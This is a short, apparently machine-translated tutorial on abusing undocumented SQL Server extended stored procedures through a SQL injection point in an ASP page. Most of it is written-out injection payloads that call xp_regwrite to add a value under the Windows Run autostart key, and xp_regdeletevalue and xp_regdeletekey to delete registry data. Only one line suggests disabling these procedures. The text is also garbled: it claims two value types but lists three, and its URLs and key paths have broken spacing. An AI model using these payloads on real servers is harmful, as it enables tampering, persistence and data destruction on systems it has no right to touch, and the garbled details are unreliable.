Unpublished extended stored procedure injection in SQL Server

Unpublished extended stored procedure injection in SQL Server
Many may not understand that SQL Server contains several extended stored procedures that can access the system registry. But in fact, these extended stored procedures are not made public. They are available from SQL Server 7.0 and are still retained in SQL Server 2000. They may be deleted in the future. however, these stored procedures provide the ability to access the system registry in the current SQL Server version,

In addition, many people often use these extended stored procedures when using SQL Server to attack the system, so it is best to disable them in SQL Server.

Suppose http: // 127.0.0.1/view. asp? Id = 165 SQL injection of SQL Server exists. We can use xp_regwrite to write data to the Registry.

Usage:

Xp_regwrite Root Key, subkey, Value Name, value type, Value
Http: // 127.0.0.1/view. asp? Id = 165; Exec
Master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ','
Software/Microsoft/Windows/CurrentVersion/run ','
Testvaluename ', 'reg _ SZ', 'Hello'

Note: There are two value types: REG_SZ, REG_DWORD, and REG_DWORD, which indicate INTEGER (delete a value using xp_regdeletevalue ).

Usage:

Xp_regdeletevalue Root Key, subkey, Value Name
Http: // 127.0.0.1/view. asp? Id = 165; Exec master.
Xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ','
Software/Microsoft/Windows/currentversion', 'testvaluename'

Xp_regdeletekey: delete key, including all values under this key

Usage:

Http: // 127.0.0.1/view. asp? Id = 165; Exec
Master. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ','
Software/Microsoft/Windows/CurrentVersion/testkey'